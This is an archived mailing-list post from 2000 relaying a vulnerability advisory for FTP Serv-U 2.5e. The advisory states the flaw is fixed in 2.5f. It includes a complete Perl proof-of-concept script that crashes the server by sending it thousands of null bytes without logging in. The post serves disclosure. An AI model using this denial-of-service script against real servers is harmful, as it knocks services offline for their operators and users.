|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: (no subject)
From: scott demlow (sdemlow
PRIMESPORTS.NET)Date: Mon Aug 07 2000 - 17:34:22 CDT
- Next message: Jesper M. Johansson: "Re: MS Word and MS Access vulnerability"
- Previous message: Georgi Guninski: "Re: MS Word and MS Access vulnerability - executing arbitraryprograms, may be exploited by IE/Outlook"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Courtesy of http://www.net-security.org/text/bugs/965608002,70838,.shtml
FTP Serv-U 2.5e vulnerability
Posted on 7.8.2000
=========================
Blue Panda Vulnerability Announcement: FTP Serv-U 2.5e
04/08/2000 (dd/mm/yyyy)
bluepandadwarf.box.sk
<http://bluepanda.box.sk/>
=========================
Problem: Sending FTP Serv-U a string containing a large number of null bytes
will cause it to stack fault. The system Serv-U is running on may become
sluggish/unstable and eventually bluescreen. A valid user/pass combination
is not required to take advantage of this vulnerability.
Vulnerable: FTP Serv-U 2.5e, possibly prior versions (untested). Immune: FTP
Serv-U 2.5f.
Vendor status: Notified. A fix has been released.
===================
Proof of concept:
===================
#!/usr/bin/perl
#
# FTP Serv-U 2.5e denial-of-service
# Blue Panda - bluepandadwarf.box.sk
# <http://bluepanda.box.sk/>
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# Crashes FTP Serv-U 2.5e by sending it a string of null bytes.
#
use IO::Socket;
$host = "ftp.host.com";
$port = "21";
print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host,
PeerPort=>$port) || die "failed.\n"; print "done.\n";
$counter = 0;
$buf = "";
while ($counter < 5000) { $buf .= "\x00"; $counter += 1;
}
print $socket "$buf\n";
sleep(4);
close($socket);
_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listservlistserv.ntsecurity.net
- Next message: Jesper M. Johansson: "Re: MS Word and MS Access vulnerability"
- Previous message: Georgi Guninski: "Re: MS Word and MS Access vulnerability - executing arbitraryprograms, may be exploited by IE/Outlook"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]